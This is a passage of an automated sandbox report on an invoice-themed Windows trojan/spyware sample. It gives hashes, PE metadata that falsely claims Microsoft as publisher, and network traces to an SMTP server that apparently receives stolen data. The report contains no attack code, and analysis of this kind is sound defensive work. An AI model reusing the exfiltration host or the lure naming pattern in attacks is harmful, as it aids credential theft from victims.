                                                http://www.carterandcone.comlBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cnBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlBILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000003.208195250.000000000540D000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/cabarga.htmlBILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://a.4cdn.org/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers8BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpfalse
                                                          		high
                                                          https://github.com/murrty/YChanEx/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://YdPNTdHEQXue9T.orgBILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.476845028.0000000002F88000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://api.github.com/repos/BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.tiro.comcBILL-OOO566876.exe, 00000000.00000003.203388064.00000000053EB000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              208.91.199.225
                                                              		us2.smtp.mailhostbox.comUnited States
                                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                              General Information

                                                              Joe Sandbox Version:31.0.0 Emerald
                                                              Analysis ID:385473
                                                              Start date:12.04.2021
                                                              Start time:15:16:17
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 8m 17s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:BILL-OOO566876.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:25
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 11.9% (good quality ratio 6.6%)
                                                              • Quality average: 32.2%
                                                              • Quality standard deviation: 36.5%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 204.79.197.200, 13.107.21.200, 52.147.198.201, 20.50.102.62, 184.30.24.56, 92.122.213.194, 92.122.213.247, 13.88.21.125, 205.185.216.42, 205.185.216.10, 20.54.26.129, 13.64.90.137
                                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              15:17:11API Interceptor969x Sleep call for process: BILL-OOO566876.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              208.91.199.225ORDER 9387383900.xlsxGet hashmaliciousBrowse
                                                                usd 420232.exeGet hashmaliciousBrowse
                                                                  P037725600.exeGet hashmaliciousBrowse
                                                                    VAT INVOICE.exeGet hashmaliciousBrowse
                                                                      New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                        swift Copy.xls.exeGet hashmaliciousBrowse
                                                                          AD1-2001028L.exeGet hashmaliciousBrowse
                                                                            AD1-2001028L (2).exeGet hashmaliciousBrowse
                                                                              #U7f8e#U91d1#U532f#U738728.84 (USD 40,257+5% #U7a05.exeGet hashmaliciousBrowse
                                                                                balance payment.exeGet hashmaliciousBrowse
                                                                                  Image0001.exeGet hashmaliciousBrowse
                                                                                    money.exeGet hashmaliciousBrowse
                                                                                      new order.docGet hashmaliciousBrowse
                                                                                        New Enquiry.MORROCCO.exeGet hashmaliciousBrowse
                                                                                          Purchase Order #07916813.exeGet hashmaliciousBrowse
                                                                                            QUOTATION 03-28-2021.exeGet hashmaliciousBrowse
                                                                                              PURCHASE ORDER COPY.exeGet hashmaliciousBrowse
                                                                                                credit notification.exeGet hashmaliciousBrowse
                                                                                                  PURCHASE ORDER COPY.exeGet hashmaliciousBrowse
                                                                                                    Ref_0866_0817.docGet hashmaliciousBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      us2.smtp.mailhostbox.comSecuriteInfo.com.Scr.Malcodegdn30.29716.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      ORDER 9387383900.xlsxGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      Payment Advice Note from 02.04.2021 to 608761.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.223
                                                                                                      e0xd7qhFaMk3Dpx.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      usd 420232.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      P037725600.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      VAT INVOICE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      VAT INVOICE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      PAYMENT SWIFT COPY MT103.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      UPDATED SOA.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      BANK PAYMENT.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      VAT INVOICE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      IMG_00000000001.PDF.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      New Order PO#121012020_____PDF_______.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      swift Copy.xls.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.223
                                                                                                      MV TBN.uslfze.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224

                                                                                                      ASN

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                      PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Scr.Malcodegdn30.29716.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      commercial invoice & packing list doc.exeGet hashmaliciousBrowse
                                                                                                      • 43.225.55.205
                                                                                                      ORDER 9387383900.xlsxGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      Payment Advice Note from 02.04.2021 to 608761.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.223
                                                                                                      Dubai REGA 2021UAE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.135
                                                                                                      e0xd7qhFaMk3Dpx.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      Dridex.xlsGet hashmaliciousBrowse
                                                                                                      • 208.91.199.159
                                                                                                      documents-351331057.xlsmGet hashmaliciousBrowse
                                                                                                      • 162.251.80.27
                                                                                                      documents-351331057.xlsmGet hashmaliciousBrowse
                                                                                                      • 162.251.80.27
                                                                                                      DUBAI UAEGH092021.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.135
                                                                                                      PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                      • 162.251.80.27
                                                                                                      documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                      • 162.251.80.27
                                                                                                      usd 420232.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      P037725600.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.225
                                                                                                      VAT INVOICE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      VAT INVOICE.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.199.224
                                                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143
                                                                                                      PAYMENT SWIFT COPY MT103.exeGet hashmaliciousBrowse
                                                                                                      • 208.91.198.143

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\BILL-OOO566876.exe.log
                                                                                                      Process:C:\Users\user\Desktop\BILL-OOO566876.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):525
                                                                                                      Entropy (8bit):5.2874233355119316
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                                                                      MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                                                                      SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                                                                      SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                                                                      SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                                                                      Malicious:true
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.6241220288435505
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:BILL-OOO566876.exe
                                                                                                      File size:893952
                                                                                                      MD5:1c84862e5b015bcecf6a194d17172dcf
                                                                                                      SHA1:a3e0a0bda2cdef94089a6012bd025113f9fbead9
                                                                                                      SHA256:ea29689e038f2a801066054f8ae2e3e3884127e8ac897f5467055250ce2b42f9
                                                                                                      SHA512:786b1e6f5c283b33bb55e252355346af43715b81f926cb035c9935ba031958e21413e2bd54fa7c8fc198b7250431361a3abf39adc418d03a72a9d3afd9d42bdc
                                                                                                      SSDEEP:12288:g/m/1Vjriddyflf5T716samRCChXNNAdUbuTSYScJ/cfCTpc7kg5M7Cdb/G/uxFB:AaSyB5T716rmRCQB6T5/hT5kb/
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............0.................. ........@.. ....................................@................................

                                                                                                      File Icon

                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4db91e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x60731BE9 [Sun Apr 11 15:55:21 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:v2.0.50727
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xdb8c40x57.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xdc0000x5c0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xd99240xd9a00False0.765819078475data7.62974179137IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xdc0000x5c00x600False0.428385416667data4.12173224524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xde0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_VERSION0xdc0a00x330data
                                                                                                      RT_MANIFEST0xdc3d00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      Translation0x0000 0x04b0
                                                                                                      LegalCopyrightCopyright Microsoft 2018
                                                                                                      Assembly Version1.0.0.0
                                                                                                      InternalNamemWu.exe
                                                                                                      FileVersion1.0.0.0
                                                                                                      CompanyNameMicrosoft
                                                                                                      LegalTrademarks
                                                                                                      Comments
                                                                                                      ProductNameASCIIArt
                                                                                                      ProductVersion1.0.0.0
                                                                                                      FileDescriptionASCIIArt
                                                                                                      OriginalFilenamemWu.exe

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 12, 2021 15:18:42.176328897 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:42.352276087 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:42.352453947 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:42.875756979 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:42.876359940 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.050717115 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.050755024 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.052225113 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.228472948 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.229031086 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.407139063 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.407423019 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.585530043 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.585781097 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.771244049 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.771477938 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.946533918 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:43.960316896 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.960429907 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.960508108 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:43.960582018 CEST49739587192.168.2.3208.91.199.225
                                                                                                      Apr 12, 2021 15:18:44.134759903 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:44.134810925 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:44.231465101 CEST58749739208.91.199.225192.168.2.3
                                                                                                      Apr 12, 2021 15:18:44.280231953 CEST49739587192.168.2.3208.91.199.225

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 12, 2021 15:16:57.626996040 CEST5062053192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:16:57.676660061 CEST53506208.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:16:57.950560093 CEST6493853192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:16:58.002713919 CEST53649388.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:16:59.123594046 CEST6015253192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:16:59.172378063 CEST53601528.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:00.325143099 CEST5754453192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:00.382375002 CEST53575448.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:10.669775009 CEST5598453192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:10.718667030 CEST53559848.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:11.884468079 CEST6418553192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:11.935942888 CEST53641858.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:12.807837009 CEST6511053192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:12.859298944 CEST53651108.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:16.975037098 CEST5836153192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:17.026108980 CEST53583618.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:22.659409046 CEST6349253192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:22.708585978 CEST53634928.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:28.712503910 CEST6083153192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:28.770036936 CEST53608318.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:29.946908951 CEST6010053192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:29.998414993 CEST53601008.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:33.402914047 CEST5319553192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:33.451730013 CEST53531958.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:34.819503069 CEST5014153192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:34.881642103 CEST53501418.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:45.875643015 CEST5302353192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:45.934130907 CEST53530238.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:50.349664927 CEST4956353192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:50.401159048 CEST53495638.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:51.484985113 CEST5135253192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:51.536576033 CEST53513528.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:53.174205065 CEST5934953192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:53.205549002 CEST5708453192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:53.222877026 CEST53593498.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:53.264185905 CEST53570848.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:54.363640070 CEST5882353192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:54.420811892 CEST53588238.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:55.627034903 CEST5756853192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:55.675615072 CEST53575688.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:56.907742977 CEST5054053192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:56.956568956 CEST53505408.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:17:58.024431944 CEST5436653192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:17:58.073045015 CEST53543668.8.8.8192.168.2.3
                                                                                                      Apr 12, 2021 15:18:03.563596010 CEST5303453192.168.2.38.8.8.8
                                                                                                      Apr 12, 2021 15:18:03.631918907 CEST53530348.8.8.8192.168.2.3
